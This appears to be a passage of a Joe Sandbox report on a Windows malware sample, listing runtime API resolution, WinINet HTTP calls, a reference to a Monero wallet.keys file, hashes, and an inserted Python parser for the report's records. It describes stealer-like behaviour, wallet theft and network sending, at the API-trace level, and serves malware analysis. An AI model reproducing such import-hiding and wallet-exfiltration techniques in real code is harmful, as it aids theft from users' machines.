                              • GetProcAddress.KERNEL32(75290000,010923E0), ref: 00339B3B
                              • GetProcAddress.KERNEL32(75BD0000,010923F8), ref: 00339B5D
                              • GetProcAddress.KERNEL32(75450000,01085870), ref: 00339B7E
                              • GetProcAddress.KERNEL32(76E90000,01099138), ref: 00339B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00339BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00339BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: dd220eb37253dba0ede648c46119a4b17aa9cc9909e4b7f412382006a46feed0
                              • Instruction ID: 1d85f697bb00605e3b4369793eab4829fbaff850c1f9c604847c5ae749dd5086
                              • Opcode Fuzzy Hash: dd220eb37253dba0ede648c46119a4b17aa9cc9909e4b7f412382006a46feed0
                              • Instruction Fuzzy Hash: F3A14EB55002409FD348EFACEE88A5637F9F7AC301704451AE605E3265D7F9A84AFF62
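The record above is the sandbox's view of how this sample resolves its imports at run time rather than through its import table: block 664 (33987a-339a8e) calls GetProcAddress 21 times against a single module base (74DD0000), block 663 then loads five more modules by name with LoadLibraryA, and the remaining seven GetProcAddress calls go against five other bases. The last two go against 76E90000, where the only name the sandbox read back is NtQueryInformationProcess; that is an ntdll export, so 76E90000 is presumably ntdll, although the report does not say so. Every resolution block after the LoadLibraryA block sits on one side of a two-way branch, which is consistent with a NULL check on the returned module handle, but the record shows only the branch, not its condition. The ref addresses in the APIs listing all fall inside the address ranges of the blocks the labels attribute them to, so the two halves of the record can be reconciled mechanically. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the two text formats shown above (the "• Api.MODULE(args), ref: addr" bullets and the control_flow_graph line), places each call in its block, groups the GetProcAddress calls by module base, and lists the branches that gate a resolution, so it can be run over any function record copied from such a report. Its one assumption, taken from the listing layout, is that the first GetProcAddress argument is the module handle and the second the name pointer (or the name itself where the sandbox resolved it).

```python
"""Parse one Joe Sandbox function record (its 'APIs' bullets and its 'control_flow_graph'
line): place every listed call in its basic block, group GetProcAddress calls by the module
base they resolve from, and find the branches that gate a resolution.  Both inputs below are
copied from the record for the function at 0x339860."""
import re
from collections import defaultdict
APIS = """\
• GetProcAddress.KERNEL32(74DD0000,010922F0), ref: 003398A1
• GetProcAddress.KERNEL32(74DD0000,01092218), ref: 003398BA
• GetProcAddress.KERNEL32(74DD0000,01092248), ref: 003398D2
• GetProcAddress.KERNEL32(74DD0000,010922A8), ref: 003398EA
• GetProcAddress.KERNEL32(74DD0000,01092350), ref: 00339903
• GetProcAddress.KERNEL32(74DD0000,01099258), ref: 0033991B
• GetProcAddress.KERNEL32(74DD0000,010858D0), ref: 00339933
• GetProcAddress.KERNEL32(74DD0000,01085930), ref: 0033994C
• GetProcAddress.KERNEL32(74DD0000,01092410), ref: 00339964
• GetProcAddress.KERNEL32(74DD0000,010924E8), ref: 0033997C
• GetProcAddress.KERNEL32(74DD0000,01092368), ref: 00339995
• GetProcAddress.KERNEL32(74DD0000,010924A0), ref: 003399AD
• GetProcAddress.KERNEL32(74DD0000,01085970), ref: 003399C5
• GetProcAddress.KERNEL32(74DD0000,01092230), ref: 003399DE
• GetProcAddress.KERNEL32(74DD0000,01092440), ref: 003399F6
• GetProcAddress.KERNEL32(74DD0000,01085710), ref: 00339A0E
• GetProcAddress.KERNEL32(74DD0000,010923B0), ref: 00339A27
• GetProcAddress.KERNEL32(74DD0000,01092260), ref: 00339A3F
• GetProcAddress.KERNEL32(74DD0000,010859D0), ref: 00339A57
• GetProcAddress.KERNEL32(74DD0000,01092278), ref: 00339A70
• GetProcAddress.KERNEL32(74DD0000,01085950), ref: 00339A88
• LoadLibraryA.KERNEL32(01092320,?,00336A00), ref: 00339A9A
• LoadLibraryA.KERNEL32(010922D8,?,00336A00), ref: 00339AAB
• LoadLibraryA.KERNEL32(01092488,?,00336A00), ref: 00339ABD
• LoadLibraryA.KERNEL32(01092458,?,00336A00), ref: 00339ACF
• LoadLibraryA.KERNEL32(01092308,?,00336A00), ref: 00339AE0
• GetProcAddress.KERNEL32(75A70000,01092380), ref: 00339B02
• GetProcAddress.KERNEL32(75290000,010923C8), ref: 00339B23
• GetProcAddress.KERNEL32(75290000,010923E0), ref: 00339B3B
• GetProcAddress.KERNEL32(75BD0000,010923F8), ref: 00339B5D
• GetProcAddress.KERNEL32(75450000,01085870), ref: 00339B7E
• GetProcAddress.KERNEL32(76E90000,01099138), ref: 00339B9F
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00339BB6
"""
CFG = ("control_flow_graph 660 339860-339874 call 339750 663 339a93-339af2 LoadLibraryA * 5 "
       "660->663 664 33987a-339a8e call 339780 GetProcAddress * 21 660->664 666 339af4-339b08 "
       "GetProcAddress 663->666 667 339b0d-339b14 663->667 664->663 669 339b46-339b4d 667->669 "
       "670 339b16-339b41 GetProcAddress * 2 667->670 671 339b68-339b6f 669->671 672 339b4f-339b63 "
       "GetProcAddress 669->672 670->669 673 339b71-339b84 GetProcAddress 671->673 674 339b89-339b90 "
       "671->674 672->671 673->674 675 339b92-339bbc GetProcAddress * 2 674->675 676 339bc1-339bc2 "
       "674->676 675->676")
API_LINE = re.compile(r"^\W*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
RANGE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")

def parse_apis(text):
    """[(api, module, [args], ref)] for each '• Api.MODULE(args), ref: addr' bullet."""
    found = (API_LINE.match(line.strip()) for line in text.splitlines())
    return [(m[1], m[2], m[3].split(","), int(m[4], 16)) for m in found if m]

def parse_cfg(line):
    """(blocks, edges); blocks maps block id -> (start, end, label tokens)."""
    toks, blocks, edges, cur, i = line.split(), {}, [], None, 1
    while i < len(toks):
        t = toks[i]
        if "->" in t:                                   # '<a>-><b>' is an edge
            edges.append(tuple(int(x) for x in t.split("->")))
        elif t.isdigit() and i + 1 < len(toks) and RANGE.match(toks[i + 1]):
            lo, hi = toks[i + 1].split("-")            # '<id> <start>-<end>' opens a block
            cur = int(t)
            blocks[cur] = (int(lo, 16), int(hi, 16), [])
            i += 1
        else:
            blocks[cur][2].append(t)                   # label: 'call <addr>' or 'Api [* N]'
        i += 1
    return blocks, edges

def calls_by_block(calls, blocks):
    """Block id -> API names, placing each call in the block whose range holds its ref."""
    placed = defaultdict(list)
    for api, _mod, _args, ref in calls:
        for blk, (lo, hi, _label) in blocks.items():
            if lo <= ref <= hi:
                placed[blk].append(api)
    return dict(placed)

def resolutions_by_module(calls):
    """Module base (GetProcAddress arg 0) -> names or name pointers resolved from it."""
    by_base = defaultdict(list)
    for api, _mod, args, _ref in calls:
        if api == "GetProcAddress":
            by_base[args[0]].append(args[1])
    return dict(by_base)

def conditional_resolutions(blocks, edges, placed):
    """Two-way branches where exactly one successor contains a GetProcAddress call."""
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    gated = []
    for blk in sorted(blocks):
        hits = [b for b in succ[blk] if "GetProcAddress" in placed.get(b, [])]
        if len(succ[blk]) == 2 and len(hits) == 1:
            gated.append((blk, hits[0]))
    return gated
```

Checking that calls_by_block places exactly the 28 GetProcAddress and 5 LoadLibraryA calls the block labels claim is a cheap way to confirm that the graph and the listing describe the same function before reading further. conditional_resolutions also reports (660, 664), the branch at the function entry that can skip the whole 21-call batch; that is worth keeping in mind when reading the function for an "already initialised" test, which the record itself cannot show.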

                              Control-flow Graph

                              control_flow_graph 764 3245c0-324695 RtlAllocateHeap 781 3246a0-3246a6 764->781 782 32474f-3247a9 VirtualProtect 781->782 783 3246ac-32474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0032460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0032479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003245C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0032471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003246CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003246B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00324662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003246C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 23bc78dbe477b4275151f0618462f834fc9b18ecadc2aef053ea48677b4b676e
                              • Instruction ID: 3f00b7e199d9729fe6e35feafda4d9936ea6dec5d02bbb43ad9f41cbcb3b6b72
                              • Opcode Fuzzy Hash: 23bc78dbe477b4275151f0618462f834fc9b18ecadc2aef053ea48677b4b676e
                              • Instruction Fuzzy Hash: B5415A20FD26047BC636FBA4AC7EEDD729E5F52B00F48D0C0ECE85A291CBB06580459B

                              Control-flow Graph
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                                • Part of subcall function 003247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00324915
                              • StrCmpCA.SHLWAPI(?,0109E7E8), ref: 0032493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00324ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00340DDB,00000000,?,?,00000000,?,",00000000,?,0109E8B8), ref: 00324DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00324E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00324E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00324E49
                              • InternetCloseHandle.WININET(00000000), ref: 00324EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00324EC5
                              • HttpOpenRequestA.WININET(00000000,0109E828,?,0109E398,00000000,00000000,00400100,00000000), ref: 00324B15
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • InternetCloseHandle.WININET(00000000), ref: 00324ECF
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 7147283270a2ef694bbe0d192777cb623317d27bbeb7bf1e7d04d51fb10e5c35
                              • Instruction ID: e3e81f41a5b26d17815740c274714fd7b7f7b8232b0dd743097e4dd24b25da68
                              • Opcode Fuzzy Hash: 7147283270a2ef694bbe0d192777cb623317d27bbeb7bf1e7d04d51fb10e5c35
                              • Instruction Fuzzy Hash: 6612B872910618AADB16EBA0DC92FEEB778AF14300F504199F1467B091EF742F49DF62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003211B7), ref: 00337880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00337887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0033789F
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: a32a3ed079ca4fd79191d508a5a7c295fc1d148aea7fbc81e9c985285d05053e
                              • Instruction ID: 75dbd34bf692144f110190ef19d5510b231cf3a32af494d2e615702567d3ccdf
                              • Opcode Fuzzy Hash: a32a3ed079ca4fd79191d508a5a7c295fc1d148aea7fbc81e9c985285d05053e
                              • Instruction Fuzzy Hash: 7FF04FB1944209ABC710DF98DD8ABAEFBB8EB08711F10025AFA05A3680C7B415048FA1
                              APIs
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 22daf803adba7f55558a9213d54987d9707c3c4b80da7d7ea3dbebe0e6445042
                              • Instruction ID: 211025eb8a959c50005d105899a95d45148d983ae893a2374a7452629f84e3e6
                              • Opcode Fuzzy Hash: 22daf803adba7f55558a9213d54987d9707c3c4b80da7d7ea3dbebe0e6445042
                              • Instruction Fuzzy Hash: B7D05E7490030CDBCB00DFE4E94A6DDBB78FB18311F000554D90573340EA70A496CAA6

                              Control-flow Graph
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01085A30), ref: 00339C2D
                              • GetProcAddress.KERNEL32(74DD0000,01085A90), ref: 00339C45
                              • GetProcAddress.KERNEL32(74DD0000,01099640), ref: 00339C5E
                              • GetProcAddress.KERNEL32(74DD0000,01099628), ref: 00339C76
                              • GetProcAddress.KERNEL32(74DD0000,010996D0), ref: 00339C8E
                              • GetProcAddress.KERNEL32(74DD0000,01099610), ref: 00339CA7
                              • GetProcAddress.KERNEL32(74DD0000,0108BAB8), ref: 00339CBF
                              • GetProcAddress.KERNEL32(74DD0000,0109D530), ref: 00339CD7
                              • GetProcAddress.KERNEL32(74DD0000,0109D518), ref: 00339CF0
                              • GetProcAddress.KERNEL32(74DD0000,0109D590), ref: 00339D08
                              • GetProcAddress.KERNEL32(74DD0000,0109D4A0), ref: 00339D20
                              • GetProcAddress.KERNEL32(74DD0000,01085A70), ref: 00339D39
                              • GetProcAddress.KERNEL32(74DD0000,01085730), ref: 00339D51
                              • GetProcAddress.KERNEL32(74DD0000,01085770), ref: 00339D69
                              • GetProcAddress.KERNEL32(74DD0000,01085790), ref: 00339D82
                              • GetProcAddress.KERNEL32(74DD0000,0109D5A8), ref: 00339D9A
                              • GetProcAddress.KERNEL32(74DD0000,0109D500), ref: 00339DB2
                              • GetProcAddress.KERNEL32(74DD0000,0108B9F0), ref: 00339DCB
                              • GetProcAddress.KERNEL32(74DD0000,010857B0), ref: 00339DE3
                              • GetProcAddress.KERNEL32(74DD0000,0109D548), ref: 00339DFB
                              • GetProcAddress.KERNEL32(74DD0000,0109D3F8), ref: 00339E14
                              • GetProcAddress.KERNEL32(74DD0000,0109D410), ref: 00339E2C
                              • GetProcAddress.KERNEL32(74DD0000,0109D428), ref: 00339E44
                              • GetProcAddress.KERNEL32(74DD0000,010857D0), ref: 00339E5D
                              • GetProcAddress.KERNEL32(74DD0000,0109D440), ref: 00339E75
                              • GetProcAddress.KERNEL32(74DD0000,0109D560), ref: 00339E8D
                              • GetProcAddress.KERNEL32(74DD0000,0109D578), ref: 00339EA6
                              • GetProcAddress.KERNEL32(74DD0000,0109D458), ref: 00339EBE
                              • GetProcAddress.KERNEL32(74DD0000,0109D470), ref: 00339ED6
                              • GetProcAddress.KERNEL32(74DD0000,0109D488), ref: 00339EEF
                              • GetProcAddress.KERNEL32(74DD0000,0109D4B8), ref: 00339F07
                              • GetProcAddress.KERNEL32(74DD0000,0109D4E8), ref: 00339F1F
                              • GetProcAddress.KERNEL32(74DD0000,0109D4D0), ref: 00339F38
                              • GetProcAddress.KERNEL32(74DD0000,0109A2D0), ref: 00339F50
                              • GetProcAddress.KERNEL32(74DD0000,0109D008), ref: 00339F68
                              • GetProcAddress.KERNEL32(74DD0000,0109CE58), ref: 00339F81
                              • GetProcAddress.KERNEL32(74DD0000,01085810), ref: 00339F99
                              • GetProcAddress.KERNEL32(74DD0000,0109CFF0), ref: 00339FB1
                              • GetProcAddress.KERNEL32(74DD0000,01085830), ref: 00339FCA
                              • GetProcAddress.KERNEL32(74DD0000,0109D068), ref: 00339FE2
                              • GetProcAddress.KERNEL32(74DD0000,0109D0B0), ref: 00339FFA
                              • GetProcAddress.KERNEL32(74DD0000,01085850), ref: 0033A013
                              • GetProcAddress.KERNEL32(74DD0000,01085D30), ref: 0033A02B
                              • LoadLibraryA.KERNEL32(0109D020,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A03D
                              • LoadLibraryA.KERNEL32(0109CF00,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A04E
                              • LoadLibraryA.KERNEL32(0109CE28,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A060
                              • LoadLibraryA.KERNEL32(0109D080,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A072
                              • LoadLibraryA.KERNEL32(0109CF78,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A083
                              • LoadLibraryA.KERNEL32(0109D038,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A095
                              • LoadLibraryA.KERNEL32(0109CF18,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A0A7
                              • LoadLibraryA.KERNEL32(0109D050,?,00335CA3,00340AEB,?,?,?,?,?,?,?,?,?,?,00340AEA,00340AE3), ref: 0033A0B8
                              • GetProcAddress.KERNEL32(75290000,01085D90), ref: 0033A0DA
                              • GetProcAddress.KERNEL32(75290000,0109CF90), ref: 0033A0F2
                              • GetProcAddress.KERNEL32(75290000,010991B8), ref: 0033A10A
                              • GetProcAddress.KERNEL32(75290000,0109CF30), ref: 0033A123
                              • GetProcAddress.KERNEL32(75290000,01085CD0), ref: 0033A13B
                              • GetProcAddress.KERNEL32(6FCD0000,0108B900), ref: 0033A160
                              • GetProcAddress.KERNEL32(6FCD0000,01085BD0), ref: 0033A179
                              • GetProcAddress.KERNEL32(6FCD0000,0108B6D0), ref: 0033A191
                              • GetProcAddress.KERNEL32(6FCD0000,0109CFA8), ref: 0033A1A9
                              • GetProcAddress.KERNEL32(6FCD0000,0109D098), ref: 0033A1C2
                              • GetProcAddress.KERNEL32(6FCD0000,01085B30), ref: 0033A1DA
                              • GetProcAddress.KERNEL32(6FCD0000,01085DF0), ref: 0033A1F2
                              • GetProcAddress.KERNEL32(6FCD0000,0109CF48), ref: 0033A20B
                              • GetProcAddress.KERNEL32(752C0000,01085DB0), ref: 0033A22C
                              • GetProcAddress.KERNEL32(752C0000,01085DD0), ref: 0033A244
                              • GetProcAddress.KERNEL32(752C0000,0109CFD8), ref: 0033A25D
                              • GetProcAddress.KERNEL32(752C0000,0109D0C8), ref: 0033A275
                              • GetProcAddress.KERNEL32(752C0000,01085E10), ref: 0033A28D
                              • GetProcAddress.KERNEL32(74EC0000,0108BA40), ref: 0033A2B3
                              • GetProcAddress.KERNEL32(74EC0000,0108BA68), ref: 0033A2CB
                              • GetProcAddress.KERNEL32(74EC0000,0109CF60), ref: 0033A2E3
                              • GetProcAddress.KERNEL32(74EC0000,01085BF0), ref: 0033A2FC
                              • GetProcAddress.KERNEL32(74EC0000,01085D50), ref: 0033A314
                              • GetProcAddress.KERNEL32(74EC0000,0108B7E8), ref: 0033A32C
                              • GetProcAddress.KERNEL32(75BD0000,0109CEE8), ref: 0033A352
                              • GetProcAddress.KERNEL32(75BD0000,01085B70), ref: 0033A36A
                              • GetProcAddress.KERNEL32(75BD0000,01099248), ref: 0033A382
                              • GetProcAddress.KERNEL32(75BD0000,0109D0E0), ref: 0033A39B
                              • GetProcAddress.KERNEL32(75BD0000,0109CFC0), ref: 0033A3B3
                              • GetProcAddress.KERNEL32(75BD0000,01085AD0), ref: 0033A3CB
                              • GetProcAddress.KERNEL32(75BD0000,01085CF0), ref: 0033A3E4
                              • GetProcAddress.KERNEL32(75BD0000,0109CDF8), ref: 0033A3FC
                              • GetProcAddress.KERNEL32(75BD0000,0109CE10), ref: 0033A414
                              • GetProcAddress.KERNEL32(75A70000,01085E50), ref: 0033A436
                              • GetProcAddress.KERNEL32(75A70000,0109CE88), ref: 0033A44E
                              • GetProcAddress.KERNEL32(75A70000,0109CEB8), ref: 0033A466
                              • GetProcAddress.KERNEL32(75A70000,0109CE70), ref: 0033A47F
                              • GetProcAddress.KERNEL32(75A70000,0109CE40), ref: 0033A497
                              • GetProcAddress.KERNEL32(75450000,01085B90), ref: 0033A4B8
                              • GetProcAddress.KERNEL32(75450000,01085E30), ref: 0033A4D1
                              • GetProcAddress.KERNEL32(75DA0000,01085C10), ref: 0033A4F2
                              • GetProcAddress.KERNEL32(75DA0000,0109CEA0), ref: 0033A50A
                              • GetProcAddress.KERNEL32(6F070000,01085AF0), ref: 0033A530
                              • GetProcAddress.KERNEL32(6F070000,01085D10), ref: 0033A548
                              • GetProcAddress.KERNEL32(6F070000,01085B50), ref: 0033A560
                              • GetProcAddress.KERNEL32(6F070000,0109CED0), ref: 0033A579
                              • GetProcAddress.KERNEL32(6F070000,01085BB0), ref: 0033A591
                              • GetProcAddress.KERNEL32(6F070000,01085D70), ref: 0033A5A9
                              • GetProcAddress.KERNEL32(6F070000,01085AB0), ref: 0033A5C2
                              • GetProcAddress.KERNEL32(6F070000,01085B10), ref: 0033A5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0033A5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0033A607
                              • GetProcAddress.KERNEL32(75AF0000,0109D2D8), ref: 0033A629
                              • GetProcAddress.KERNEL32(75AF0000,01099108), ref: 0033A641
                              • GetProcAddress.KERNEL32(75AF0000,0109D260), ref: 0033A659
                              • GetProcAddress.KERNEL32(75AF0000,0109D188), ref: 0033A672
                              • GetProcAddress.KERNEL32(75D90000,01085C30), ref: 0033A693
                              • GetProcAddress.KERNEL32(6E160000,0109D338), ref: 0033A6B4
                              • GetProcAddress.KERNEL32(6E160000,01085C50), ref: 0033A6CD
                              • GetProcAddress.KERNEL32(6E160000,0109D3E0), ref: 0033A6E5
                              • GetProcAddress.KERNEL32(6E160000,0109D0F8), ref: 0033A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d57775746f97e7b837e6761e690305138da0bf85663ac97dc4a1c02b3282459b
                              • Instruction ID: df38c8386932f23459b5ee11e5901f9d4f7bc495514792b33a9ded1d69147844
                              • Opcode Fuzzy Hash: d57775746f97e7b837e6761e690305138da0bf85663ac97dc4a1c02b3282459b
                              • Instruction Fuzzy Hash: B4625FB5500240AFC748DFACEE8895637F9F7AC301714851AE605E3235DBB9A84AFF52

                              Control-flow Graph

                              • Executed
                              • Not Executed
